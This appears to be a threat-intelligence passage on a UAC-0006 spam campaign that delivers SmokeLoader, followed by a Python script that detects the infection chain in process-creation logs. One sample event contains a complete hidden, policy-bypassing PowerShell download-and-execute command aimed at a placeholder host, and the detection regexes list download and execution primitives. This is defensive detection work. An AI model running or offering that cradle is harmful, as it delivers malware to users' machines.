A Financially Motivated Campaign
According to the notice, the attackers are sending spam emails with the subject line “bill/payments” and a ZIP archive attached.
The attacks have been attributed to UAC-0006, a group believed to have been active since at least 2013.
The group's goal is to steal authentication material such as credentials, keys, or certificates and then use it to push fraudulent financial transactions into accounts under its control.
Investigating the Polyglot File Further
The polyglot file pax_2023_AB1058..js uses PowerShell to download and run additional payloads. Specifically, it fetches an executable named portable.exe which, once launched, deploys the SmokeLoader malware.
The file's creation date and the domain's registration date suggest the campaign began in April 2023. Once running, SmokeLoader injects malicious code into already-running processes and starts downloading further payloads.
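The chain described above (ZIP attachment, a script file that hands off to PowerShell, a download-and-execute cradle that drops a second-stage binary) leaves a recognisable trail in process-creation telemetry. The following Python is an added illustration written for this page, not code from the article, CERT-UA, or any vendor. It runs three simple rules over a handful of constructed Sysmon-style process-creation events (invented paths, user name and URL; nothing here is an indicator from the real campaign). The `Temp1_<name>.zip` path pattern is assumed to be the folder Windows Explorer uses when a file is opened directly from inside a ZIP; the rule names and scoring are the author's own choices.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1) used only to drive
# this example. They are NOT logs from the campaign the article describes; every
# path, user name and URL is an invented placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\acct\AppData\Local\Temp\Temp1_bill.zip\invoice_2023.js"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": ("powershell.exe -nop -w hidden -ep bypass -c "
                     "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/portable.exe',"
                     "'C:\\Users\\acct\\AppData\\Local\\Temp\\portable.exe');"
                     "Start-Process 'C:\\Users\\acct\\AppData\\Local\\Temp\\portable.exe'\"")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_EXTENSIONS = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta)\b", re.IGNORECASE)
# Assumption: Explorer extracts a file opened in place from a ZIP to %TEMP%\Temp1_<name>.zip\
ZIP_TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\Temp1_[^\\]+\.zip\\", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)
EXEC_STAGE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item", re.IGNORECASE)
EVASION_FLAGS = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return the list of rule names that fire on a single process-creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []
    # Rule 1: a script host executing a script straight out of Explorer's ZIP temp folder,
    # i.e. the user double-clicked a .js inside the mailed archive.
    if image in SCRIPT_HOSTS and SCRIPT_EXTENSIONS.search(cmd) and ZIP_TEMP_PATH.search(cmd):
        hits.append("script_from_zip_attachment")
    # Rule 2: PowerShell spawned by a script host (the JS -> PowerShell hand-off).
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("powershell_child_of_script_host")
    # Rule 3: download-and-execute cradle; note the extra hit when paired with hidden/bypass flags.
    if image in POWERSHELL and DOWNLOAD_CRADLE.search(cmd) and EXEC_STAGE.search(cmd):
        hits.append("download_execute_cradle")
        if EVASION_FLAGS.search(cmd):
            hits.append("evasion_flags")
    return hits


def analyze_events(events):
    """Map event index -> fired rules, omitting events with no hits."""
    return {i: hits for i, ev in enumerate(events) if (hits := analyze_event(ev))}


if __name__ == "__main__":
    for idx, rules in analyze_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The fourth event (an administrator running a local inventory script) deliberately produces no hits: the cradle rule requires both a download primitive and an execution primitive, which keeps benign PowerShell out of the alert queue, while the parent-process rule catches the hand-off even when the command line is obfuscated.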